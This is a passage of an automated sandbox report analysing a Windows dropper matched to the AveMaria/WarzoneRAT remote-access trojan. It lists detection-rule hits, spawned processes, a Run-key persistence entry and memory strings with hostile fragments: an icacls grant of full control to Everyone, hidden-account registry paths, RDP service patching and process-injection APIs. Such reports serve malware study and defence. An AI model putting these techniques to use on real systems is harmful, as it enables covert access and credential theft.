              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
              Source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
              Source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeCode function: 0_2_00BBA5A80_2_00BBA5A8
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeCode function: 0_2_00BBD0380_2_00BBD038
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04D4C2581_2_04D4C258
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04D4C2E31_2_04D4C2E3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EAA5D01_2_07EAA5D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EAC0301_2_07EAC030
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EA92711_2_07EA9271
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EABC301_2_07EABC30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EA67401_2_07EA6740
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EA62D01_2_07EA62D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EAA2781_2_07EAA278
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EABC301_2_07EABC30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EC9E801_2_07EC9E80
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EC06201_2_07EC0620
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EC7B701_2_07EC7B70
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581928376.000000000259B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.591838998.0000000007200000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameLrqcelzadlkdb.dll" vs SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.578114187.00000000003E8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeBinary or memory string: OriginalFilenameDjkblrrkcs.exe4 vs SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: Mqombsglp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeJump to behavior
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-Date
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig/release
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANAA1AA==
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig/renew
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-DateJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig/releaseJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANAA1AA==Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig/renewJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeFile created: C:\Users\user\AppData\Roaming\MeiilnstlzJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mhdrfzpc.o2h.ps1Jump to behavior
              Source: classification engineClassification label: mal100.troj.evad.winEXE@17/8@6/2
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4808:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:488:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_01
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeStatic file information: File size 1056256 > 1048576
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x101400
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, u0005.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: Mqombsglp.exe.0.dr, u0005.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.0.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.150000.0.unpack, u0005.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EA6E08 push eax; ret 1_2_07EA6DF7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EA6DF2 push eax; ret 1_2_07EA6DF7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EC4ED1 push eax; mov dword ptr [esp], ecx1_2_07EC4EE4
              Source: initial sampleStatic PE information: section name: .text entropy: 7.999494429591008
              Source: initial sampleStatic PE information: section name: .text entropy: 7.999494429591008

              Persistence and Installation Behavior

              barindex
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeFile created: C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exeJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MqombsglpJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MqombsglpJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
